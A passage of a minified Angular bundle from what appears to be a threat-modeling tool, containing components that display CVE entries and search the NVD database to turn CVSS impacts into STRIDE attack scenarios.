.mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.property-form-field[_ngcontent-%COMP%]{width:300px}']}),t})();function B9e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",9),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),it(8,"input",10),s(9,"\n    "),u(),s(10,"\n    "),m(11,"mat-form-field",11),s(12,"\n      "),m(13,"mat-label"),s(14),oe(15,"translate"),u(),s(16,"\n      "),it(17,"input",12),s(18,"\n    "),u(),s(19,"\n    "),m(20,"mat-form-field",11),s(21,"\n      "),m(22,"mat-label"),s(23),oe(24,"translate"),u(),s(25,"\n      "),it(26,"input",12),oe(27,"translate"),s(28,"\n    "),u(),s(29,"\n    "),m(30,"button",4),he("click",function(){const r=be(e).$implicit;return Me(B(2).OpenCVSS(r))}),oe(31,"translate"),s(32,"\n      "),m(33,"mat-icon"),s(34,"open_in_new"),u(),s(35,"\n    "),u(),s(36,"\n    "),it(37,"br"),s(38,"\n  "),Mt()}if(2&t){const e=a.$implicit,i=B(2);C(5),za("",re(6,8,"shared.cvss.name.s")," ",e.Version,""),C(3),V("ngModel",e.Score),C(6),ke(re(15,10,"report.CvssVector")),C(3),V("ngModel",i.GetVector(e)),C(6),ke(re(24,12,"properties.Severity")),C(3),V("ngModel",re(27,14,i.GetSeverity(e.Score))),C(4),at("matTooltip",re(31,16,"general.openInNew"))}}function H9e(t,a){if(1&t&&(m(0,"mat-accordion",13),s(1,"\n    "),m(2,"mat-expansion-panel",14),s(3,"\n      "),m(4,"mat-expansion-panel-header"),s(5,"\n        "),m(6,"mat-panel-title"),s(7),u(),s(8,"\n        "),m(9,"mat-panel-description"),s(10,"\n        "),u(),s(11,"\n      "),u(),s(12,"\n      "),it(13,"app-cwe-entry",15),s(14,"\n    "),u(),s(15,"\n  "),u()),2&t){const e=B(2);C(2),V("expanded",!0),C(5),ct("\n          CWE-",e.entry.CweID,"\n        "),C(6),V("cweID",e.entry.CweID)}}function U9e(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-form-field",2),s(3,"\n    "),m(4,"mat-label"),s(5,"ID"),u(),s(6,"\n    "),it(7,"input",3),s(8,"\n  "),u(),s(9,"\n  "),m(10,"mat-form-field",2),s(11,"\n    "),m(12,"mat-label"),s(13),oe(14,"translate"),u(),s(15,"\n    "),it(16,"input",3),oe(17,"localDate"),s(18,"\n  "),u(),s(19,"\n  "),m(20,"mat-form-field",2),s(21,"\n    "),m(22,"mat-label"),s(23),oe(24,"translate"),u(),s(25,"\n    "),it(26,"input",3),s(27,"\n  "),u(),s(28,"\n  "),m(29,"button",4),he("click",function(){return be(e),Me(B().OpenCVE())}),oe(30,"translate"),s(31,"\n    "),m(32,"mat-icon"),s(33,"open_in_new"),u(),s(34,"\n  "),u(),s(35,"\n  "),it(36,"br"),s(37,"\n  "),ne(38,B9e,39,18,"ng-container",5),s(39,"\n  "),m(40,"mat-form-field",6),s(41,"\n    "),m(42,"mat-label"),s(43),oe(44,"translate"),u(),s(45,"\n    "),it(46,"textarea",7),s(47,"\n  "),u(),s(48,"\n  "),ne(49,H9e,16,3,"mat-accordion",8),s(50,"\n"),u()}if(2&t){const e=B();C(7),V("value",e.entry.ID),C(6),ke(re(14,10,"shared.cveentry.published")),C(3),V("value",re(17,12,e.entry.Published)),C(7),ke(re(24,14,"properties.Status")),C(3),V("value",e.entry.VulnStatus),C(3),at("matTooltip",re(30,16,"general.openInNew")),C(9),V("ngForOf",e.entry.Scores),C(5),ke(re(44,18,"properties.Description")),C(3),V("value",e.entry.Description),C(3),V("ngIf",e.entry.CweID)}}let I5=(()=>{class t{constructor(){}ngOnInit(){}OpenCVE(){window.open(t.GetURL(this.entry.ID),"_blank")}OpenCVSS(e){window.open(Wm.GetURL(e),"_blank")}GetVector(e){const i=Wm.GetVector(e);return i.substring(i.indexOf("/")+1)}GetSeverity(e){return vn.ToString(Wm.ToThreatSeverity(e))}static GetURL(e){return"https://nvd.nist.gov/vuln/detail/"+e}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["app-cve-entry"]],inputs:{entry:"entry"},decls:1,vars:1,consts:[["style","pointer-events: none;",4,"ngIf"],[2,"pointer-events","none"],["appearance","fill",2,"width","200px","margin-right","5px"],["matInput","","type","text",3,"value"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],[4,"ngFor","ngForOf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","cdkTextareaAutosize","",3,"value"],["style","pointer-events: all;",4,"ngIf"],["appearance","fill",2,"width","200px"],["matInput","","type","number",3,"ngModel"],["appearance","fill",2,"width","200px","margin-left","5px"],["matInput","",3,"ngModel"],[2,"pointer-events","all"],[2,"margin-bottom","10px",3,"expanded"],[3,"cweID"]],template:function(e,i){1&e&&ne(0,U9e,51,20,"div",0),2&e&&V("ngIf",i.entry)}}),t})();function G9e(t,a){1&t&&it(0,"mat-progress-spinner",20),2&t&&V("diameter",20)}function j9e(t,a){1&t&&(m(0,"th",21),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"general.Add")))}function Q9e(t,a){if(1&t){const e=Ye();m(0,"td",22),s(1,"\n      "),m(2,"button",23),he("click",function(n){const c=be(e).$implicit;return B().AddThreat(c),Me(n.stopPropagation())}),oe(3,"translate"),s(4,"\n        "),m(5,"mat-icon"),s(6,"flash_on"),u(),s(7,"\n      "),u(),s(8,"\n    "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"pages.modeling.diagram.addAttackScenario")))}function $9e(t,a){1&t&&(m(0,"th",24),s(1," ID "),u())}function K9e(t,a){if(1&t&&(m(0,"td",22),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.ID," ")}}function X9e(t,a){1&t&&(m(0,"th",24),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"shared.cveentry.published")," "))}function Y9e(t,a){if(1&t&&(m(0,"td",22),s(1),oe(2,"localDate"),u()),2&t){const e=a.$implicit;C(1),ct(" ",re(2,1,e.Published)," ")}}function J9e(t,a){1&t&&(m(0,"th",24),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function Z9e(t,a){if(1&t&&(m(0,"td",22),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.VulnStatus," ")}}function ePe(t,a){1&t&&(m(0,"th",24),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"report.CvssScore")," "))}function tPe(t,a){if(1&t&&(m(0,"td",22),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetScore(e)," ")}}function iPe(t,a){1&t&&(m(0,"th",21),s(1,"\xa0"),u())}function aPe(t,a){1&t&&(m(0,"mat-icon"),s(1,"keyboard_arrow_down"),u())}function nPe(t,a){1&t&&(m(0,"mat-icon"),s(1,"keyboard_arrow_up"),u())}function oPe(t,a){if(1&t){const e=Ye();m(0,"td",22),s(1,"\n      "),m(2,"button",25),he("click",function(n){const c=be(e).$implicit,d=B();return d.expandedElement=d.expandedElement===c?null:c,Me(n.stopPropagation())}),s(3,"\n        "),ne(4,aPe,2,0,"mat-icon",26),s(5,"\n        "),ne(6,nPe,2,0,"mat-icon",26),s(7,"\n      "),u(),s(8,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();C(4),V("ngIf",i.expandedElement!==e),C(2),V("ngIf",i.expandedElement===e)}}function rPe(t,a){1&t&&it(0,"app-cve-entry",29),2&t&&V("entry",B().$implicit)}function sPe(t,a){if(1&t&&(m(0,"td",22),s(1,"\n      "),m(2,"div",27),s(3,"\n        "),ne(4,rPe,1,1,"app-cve-entry",28),s(5,"\n      "),u(),s(6,"\n    "),u()),2&t){const e=a.$implicit,i=B();Rt("colspan",i.columnsToDisplayWithExpand.length),C(2),V("@detailExpand",e==i.expandedElement?"expanded":"collapsed"),C(2),V("ngIf",e==i.expandedElement)}}function cPe(t,a){1&t&&it(0,"tr",30)}function lPe(t,a){if(1&t){const e=Ye();m(0,"tr",31),he("click",function(){const r=be(e).$implicit,c=B();return Me(c.expandedElement=c.expandedElement===r?null:r)}),s(1,"\n  "),u()}if(2&t){const e=a.$implicit;Ct("entry-expanded-row",B().expandedElement===e)}}function dPe(t,a){1&t&&it(0,"tr",32)}function mPe(t,a){1&t&&(m(0,"tr",33),s(1,"\n    "),m(2,"td",34),s(3),oe(4,"translate"),u(),s(5,"\n  "),u()),2&t&&(C(3),ke(re(4,1,"shared.cvesearch.noResults")))}const uPe=function(){return["expandedDetail"]},hPe=function(){return[5,10,50,100]};let HG=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=n,this.dataService=r,this.dialog=c,this.locStorage=d,this.http=T,this.SearchString="",this.ExactSearch=!1,this.IsSearching=!1,this.NoSearchResult=!1,this.columnsToDisplay=["add","id","published","vulnStatus","score"],this.columnsToDisplayWithExpand=[...this.columnsToDisplay,"expand"],e&&(this.element=e),i&&(this.viewID=i.Value)}ngOnInit(){const e=this.locStorage.Get(si.CVE_SEARCH_HISTORY);if(null==e)this.searchHistory={},this.locStorage.Set(si.CVE_SEARCH_HISTORY,JSON.stringify(this.searchHistory));else if(this.element&&this.viewID){this.searchHistory=JSON.parse(e);const i=this.searchHistory[this.element.ID+this.viewID];i&&(this.SearchString=i,this.Search())}}Search(){var e;(null===(e=this.SearchString)||void 0===e?void 0:e.length)>0&&!this.IsSearching&&(this.IsSearching=!0,this.dataSource=new zd([]),this.dataSource.paginator=this.paginator,this.http.get("https://services.nvd.nist.gov/rest/json/cves/2.0?keywordSearch="+this.SearchString).subscribe(i=>{var n;if(this.searchHistory[this.element.ID+this.viewID]=this.SearchString,this.locStorage.Set(si.CVE_SEARCH_HISTORY,JSON.stringify(this.searchHistory)),(null===(n=i.vulnerabilities)||void 0===n?void 0:n.length)>0){const r=[];i.vulnerabilities.forEach(c=>{c.cve&&r.push(class q9e{static FromJSON(a){var e,i;let n={ID:a.id,Published:a.published,VulnStatus:a.vulnStatus,Scores:[],Severities:[],Description:"",SourceIdentifier:a.sourceIdentifier,CweID:null};return a.metrics&&Object.keys(a.metrics).length>0&&Object.keys(a.metrics).forEach(r=>{var c;if((null===(c=a.metrics[r])||void 0===c?void 0:c.length)>0){const d=a.metrics[r][0].cvssData;let T={Version:d.version,Vector:d.vectorString};d.baseScore&&(T.Score=Number(d.baseScore)),("3.0"==d.version||"3.1"==d.version)&&(d.attackVector&&(T.AV=d.attackVector[0]),d.attackComplexity&&(T.AC=d.attackComplexity[0]),d.privilegesRequired&&(T.PR=d.privilegesRequired[0]),d.userInteraction&&(T.UI=d.userInteraction[0]),d.scope&&(T.S=d.scope[0]),d.confidentialityImpact&&(T.C=d.confidentialityImpact[0]),d.integrityImpact&&(T.I=d.integrityImpact[0]),d.availabilityImpact&&(T.A=d.availabilityImpact[0])),d.baseSeverity&&n.Severities.push("LOW"==d.baseSeverity?cn.Low:"MEDIUM"==d.baseSeverity?cn.Medium:"HIGH"==d.baseSeverity?cn.High:cn.Critical),n.Scores.push(T)}}),(null===(e=a.descriptions)||void 0===e?void 0:e.length)>0&&(n.Description=a.descriptions.length>1?a.descriptions.find(r=>"en"==r.lang).value:a.descriptions[0].value),(null===(i=a.weaknesses)||void 0===i?void 0:i.length)>0&&a.weaknesses.forEach(r=>{var c;if(null==n.CweID&&(null===(c=r.description)||void 0===c?void 0:c.length)>0){const d=r.description[0].value;isNaN(Number(d.replace("CWE-","")))||(n.CweID=Number(d.replace("CWE-","")))}}),n}}.FromJSON(c.cve)),Object.keys(c).length>1&&console.log("what?",c)}),r.reverse(),this.dataSource=new zd(r),this.dataSource.sort=this.sort,this.dataSource.paginator=this.paginator,this.NoSearchResult=0==r.length}else this.NoSearchResult=!0;this.IsSearching=!1}))}AddThreat(e){if(this.element&&this.viewID){let i=this.dataService.Project.CreateAttackScenario(this.viewID,!1);const n=[];if(e.Scores.length>0){const r=this.dataService.Config.GetThreatCategoryGroups().find(c=>"STRIDE"==c.Name);if(r){const c=JSON.parse(JSON.stringify(e.Scores));c.sort((T,k)=>k.Version.localeCompare(T.Version));const d=c[0].Vector;"N"!=d[d.indexOf("/C:")+3]&&n.push(r.ThreatCategories.find(T=>T.ImpactCats.includes(so.Confidentiality)).ID),"N"!=d[d.indexOf("/I:")+3]&&n.push(r.ThreatCategories.find(T=>T.ImpactCats.includes(so.Integrity)).ID),"N"!=d[d.indexOf("/A:")+3]&&n.push(r.ThreatCategories.find(T=>T.ImpactCats.includes(so.Availability)).ID)}}i.SetMapping("",n,this.element,[this.element],null,null,null,null),i.Description=e.Description,i.Name=e.ID,i.CveEntry=e,e.Severities&&(i.Severity=Math.max(...e.Severities)),e.Scores.some(r=>r.Version.startsWith("3."))&&(i.ScoreCVSS=JSON.parse(JSON.stringify(e.Scores.find(r=>r.Version.startsWith("3."))))),i.IsGenerated=!1,this.dialog.OpenAttackScenarioDialog(i,!0).subscribe(r=>{r||this.dataService.Project.DeleteAttackScenario(i)})}}SearchKeyUp(e){"Enter"==e.key&&this.Search()}GetScore(e){var i;return(null===(i=e.Scores)||void 0===i?void 0:i.length)>0?Math.max(...e.Scores.map(n=>n.Score).filter(n=>null!=n)).toString():""}}return t.\u0275fac=function(e){return new(e||t)(Ee(Np,8),Ee(E2,8),Ee(Oa),Ee(Yi),Ee(Wn),Ee(_r),Ee(op))},t.\u0275cmp=Wt({type:t,selectors:[["app-cve-search"]],viewQuery:function(e,i){if(1&e&&(Mi(al,5),Mi(x8,5)),2&e){let n;Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.paginator=n.first)}},decls:79,vars:15,consts:[["appearance","fill"],["matInput","","type","text",3,"ngModel","ngModelChange","keyup"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["style","display: inline; vertical-align: super; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],["mat-table","","multiTemplateDataRows","","matSort","",3,"dataSource"],["matColumnDef","add","stickyEnd",""],["mat-header-cell","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","id"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["matColumnDef","published"],["matColumnDef","vulnStatus"],["matColumnDef","score"],["matColumnDef","expand"],["matColumnDef","expandedDetail"],["mat-header-row","",4,"matHeaderRowDef"],["mat-row","","class","entry-row",3,"entry-expanded-row","click",4,"matRowDef","matRowDefColumns"],["mat-row","","class","entry-detail-row",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["showFirstLastButtons","",3,"pageSizeOptions"],["mode","indeterminate",2,"display","inline","vertical-align","super","margin-left","5px",3,"diameter"],["mat-header-cell",""],["mat-cell",""],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-cell","","mat-sort-header",""],["mat-icon-button","",3,"click"],[4,"ngIf"],[1,"entry-element-detail"],["style","width: 100%;",3,"entry",4,"ngIf"],[2,"width","100%",3,"entry"],["mat-header-row",""],["mat-row","",1,"entry-row",3,"click"],["mat-row","",1,"entry-detail-row"],[1,"mat-row"],["colspan","5",1,"mat-cell"]],template:function(e,i){1&e&&(m(0,"mat-form-field",0),s(1,"\n  "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n  "),m(6,"input",1),he("ngModelChange",function(r){return i.SearchString=r})("keyup",function(r){return i.SearchKeyUp(r)}),u(),s(7,"\n  "),m(8,"button",2),he("click",function(){return i.Search()}),oe(9,"translate"),s(10,"\n    "),m(11,"mat-icon"),s(12,"search"),u(),s(13,"\n  "),u(),s(14,"\n"),u(),s(15,"\n"),ne(16,G9e,1,1,"mat-progress-spinner",3),s(17,"\n\n"),s(18,"\n"),m(19,"table",4),s(20,"\n  "),bt(21,5),s(22,"\n    "),ne(23,j9e,3,3,"th",6),s(24,"\n    "),ne(25,Q9e,9,3,"td",7),s(26,"\n  "),Mt(),s(27,"\n  "),bt(28,8),s(29,"\n    "),ne(30,$9e,2,0,"th",9),s(31,"\n    "),ne(32,K9e,2,1,"td",7),s(33,"\n  "),Mt(),s(34,"\n  "),bt(35,10),s(36,"\n    "),ne(37,X9e,3,3,"th",9),s(38,"\n    "),ne(39,Y9e,3,3,"td",7),s(40,"\n  "),Mt(),s(41,"\n  "),bt(42,11),s(43,"\n    "),ne(44,J9e,3,3,"th",9),s(45,"\n    "),ne(46,Z9e,2,1,"td",7),s(47,"\n  "),Mt(),s(48,"\n  "),bt(49,12),s(50,"\n    "),ne(51,ePe,3,3,"th",9),s(52,"\n    "),ne(53,tPe,2,1,"td",7),s(54,"\n  "),Mt(),s(55,"\n\n  "),bt(56,13),s(57,"\n    "),ne(58,iPe,2,0,"th",6),s(59,"\n    "),ne(60,oPe,9,2,"td",7),s(61,"\n  "),Mt(),s(62,"\n\n  "),s(63,"\n  "),bt(64,14),s(65,"\n    "),ne(66,sPe,7,3,"td",7),s(67,"\n  "),Mt(),s(68,"\n\n  "),ne(69,cPe,1,0,"tr",15),s(70,"\n  "),ne(71,lPe,2,2,"tr",16),s(72,"\n  "),ne(73,dPe,1,0,"tr",17),s(74,"\n  "),ne(75,mPe,6,3,"tr",18),s(76,"\n"),u(),s(77,"\n"),it(78,"mat-paginator",19)),2&e&&(C(3),ke(re(4,9,"shared.cvesearch.Search")),C(3),V("ngModel",i.SearchString),C(2),at("matTooltip",re(9,11,"shared.cvesearch.Search")),C(8),V("ngIf",i.IsSearching),C(3),V("dataSource",i.dataSource),C(50),V("matHeaderRowDef",i.columnsToDisplayWithExpand),C(2),V("matRowDefColumns",i.columnsToDisplayWithExpand),C(2),V("matRowDefColumns",kr(13,uPe)),C(5),V("pageSizeOptions",kr(14,hPe)))},styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}table[_ngcontent-%COMP%]{width:100%}tr.entry-detail-row[_ngcontent-%COMP%]{height:0}.entry-row[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{border-bottom-width:0}.entry-element-detail[_ngcontent-%COMP%]{overflow:hidden;display:flex}"],data:{animation:[nr("detailExpand",[sn("collapsed",zi({height:"0px",minHeight:"0"})),sn("expanded",zi({height:"*"})),gn("expanded <=> collapsed",En("225ms cubic-bezier(0.4, 0.0, 0.2, 1)"))])]}}),t})();const pPe=["nameBox"],_Pe=["searchBox"];function gPe(t,a){if(1&t){const e=Ye();m(0,"button",31),he("click",function(){return be(e),Me(B(2).testCase.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function CPe(t,a){1&t&&(m(0,"mat-hint",32),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function yPe(t,a){if(1&t&&(m(0,"mat-option",33),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetTestCaseStateName(e)))}}function bPe(t,a){if(1&t){const e=Ye();m(0,"div",34),s(1,"\n        "),m(2,"img",35,36),he("click",function(){const r=be(e).$implicit;return Me(B(2).ViewImage(r))}),u(),s(4,"\n        "),m(5,"div",37),s(6,"\n          "),m(7,"button",38),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteImage(r))}),s(8,"\n            "),m(9,"mat-icon"),s(10,"remove"),u(),s(11,"\n          "),u(),s(12,"\n        "),u(),s(13,"\n      "),u()}if(2&t){const e=a.$implicit;C(2),V("src",e,nm)}}function MPe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ct("(",e.Value.length,")")}}const UG=function(t){return{groups:t}};function vPe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",39),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedLinks=r)}),s(1,"\n            "),m(2,"mat-icon",40),s(3,"arrow_right"),u(),s(4,"\n            "),m(5,"div",41),s(6),oe(7,"translate"),ne(8,MPe,2,1,"ng-container",0),u(),s(9,"\n            "),m(10,"button",42),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()(),s(14,"\n          "),u()}if(2&t){const e=a.$implicit;B();const i=Ti(105),n=B();Ct("highlight-light",n.selectedLinks===e&&!n.theme.IsDarkMode)("highlight-dark",n.selectedLinks===e&&n.theme.IsDarkMode),C(6),ct("",re(7,9,e.Key)," "),C(2),V("ngIf",e.Value.length>0),C(2),at("matTooltip",re(11,11,"general.Add")),V("matMenuTriggerFor",i)("matMenuTriggerData",fr(13,UG,n.GetMenuGroups(e)))}}const APe=function(t){return{items:t}};function TPe(t,a){if(1&t&&(m(0,"button",46),s(1,"\n              "),m(2,"span"),s(3),u(),s(4,"\n            "),u()),2&t){const e=a.$implicit;B(2),V("matMenuTriggerFor",Ti(111))("matMenuTriggerData",fr(3,APe,e.Value)),C(3),ke(e.Key.Name)}}function EPe(t,a){if(1&t){const e=Ye();s(0,"\n            "),m(1,"input",43,44),he("ngModelChange",function(n){return be(e),Me(B(2).searchString=n)})("click",function(){return be(e),Me(B(2).OnSearchBoxClick())}),oe(3,"translate"),u(),s(4,"\n            "),ne(5,TPe,5,5,"button",45),s(6,"\n          ")}if(2&t){const e=a.groups;B();const i=Ti(117),n=B();C(1),at("placeholder",re(3,5,"general.Search")),V("ngModel",n.searchString)("matMenuTriggerFor",i)("matMenuTriggerData",fr(7,UG,e)),C(4),V("ngForOf",e)}}function DPe(t,a){if(1&t){const e=Ye();m(0,"button",48),he("click",function(){const r=be(e).$implicit;return Me(B(3).AddLink(r))}),s(1,"\n              "),m(2,"span"),s(3),u(),s(4,"\n            "),u()}if(2&t){const e=a.$implicit;C(3),ke(e.Name)}}function xPe(t,a){if(1&t&&(s(0,"\n            "),ne(1,DPe,5,1,"button",47),s(2,"\n          ")),2&t){const e=a.items;C(1),V("ngForOf",e)}}function wPe(t,a){if(1&t){const e=Ye();m(0,"button",50),he("click",function(){const r=be(e).$implicit;return Me(B(3).AddLink(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function IPe(t,a){if(1&t&&(s(0,"\n            "),ne(1,wPe,2,2,"button",49),s(2,"\n          ")),2&t){const e=a.groups,i=B(2);C(1),V("ngForOf",i.GetFilteredList(e))}}function RPe(t,a){if(1&t){const e=Ye();m(0,"li"),s(1,"\n                "),m(2,"button",53),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnItemClick(r))}),s(3),u(),s(4,"\n                "),m(5,"button",17),he("click",function(){const r=be(e).$implicit;return Me(B(3).RemoveLink(r))}),oe(6,"translate"),m(7,"mat-icon"),s(8,"delete"),u()(),s(9,"\n              "),u()}if(2&t){const e=a.$implicit,i=B(3);C(3),za("\n                  ",e.Name," in ",i.GetItemView(e).Name,"\n                "),C(2),at("matTooltip",re(6,3,"general.Delete"))}}function SPe(t,a){if(1&t&&(bt(0),s(1,"\n          "),m(2,"div",51),s(3,"\n            "),m(4,"ul"),s(5,"\n              "),ne(6,RPe,10,5,"li",52),s(7,"\n            "),u(),s(8,"\n          "),u(),s(9,"\n        "),Mt()),2&t){const e=B(2);C(6),V("ngForOf",e.selectedLinks.Value)}}function kPe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",1),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(B().testCase.Name=n)}),u(),s(10,"\n    "),ne(11,gPe,6,3,"button",4),s(12,"\n  "),u(),s(13,"\n  "),m(14,"mat-form-field",5),s(15,"\n    "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n    "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(B().testCase.Number=n)}),u(),s(21,"\n    "),ne(22,CPe,3,3,"mat-hint",7),s(23,"\n  "),u(),s(24,"\n  "),it(25,"br"),s(26,"\n  "),m(27,"mat-form-field",8),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(B().testCase.Status=n)}),oe(34,"translate"),s(35,"\n      "),ne(36,yPe,3,4,"mat-option",10),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),m(40,"button",11),he("click",function(){return be(e),Me(B().AddAttackScenario())}),oe(41,"translate"),m(42,"mat-icon"),s(43,"flash_on"),u()(),s(44,"\n  "),it(45,"br"),s(46,"\n  "),m(47,"mat-form-field",12),s(48,"\n    "),m(49,"mat-label"),s(50),oe(51,"translate"),u(),s(52,"\n    "),m(53,"textarea",13),he("ngModelChange",function(n){return be(e),Me(B().testCase.Description=n)}),u(),s(54,"\n  "),u(),s(55,"\n  "),m(56,"div"),s(57,"\n    